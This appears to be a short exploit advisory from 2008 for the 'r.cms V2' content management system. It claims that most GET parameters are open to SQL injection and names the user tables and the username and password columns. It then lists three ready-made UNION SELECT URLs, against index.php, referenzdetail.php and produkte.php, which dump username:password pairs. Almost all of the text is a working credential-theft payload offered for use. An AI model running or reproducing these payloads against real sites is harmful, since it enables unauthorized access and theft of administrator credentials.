############################################################### # # r.cms V2 - Multiple SQL Injection Vulnerabilities # # Vulnerability discovered by: Lidloses_Auge # Greetz to: -=Player=- , Suicide, g4ms3, enco, # Palme, GPM, Free-Hack # Date: 16.12.2008 # ############################################################### # # Admin Panel: [Target]/rcms/ # Description: Almost every GET parameter is vulnerable # to SQL Injection, so i won't list 'em all. # There are two possible tables which contain # user data, depending on the CMS version. # Table: # rcmsv2 # or: # rcms # # The Columns for username and password are: # username # userpassword # ############################################################### http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/* http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/* http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*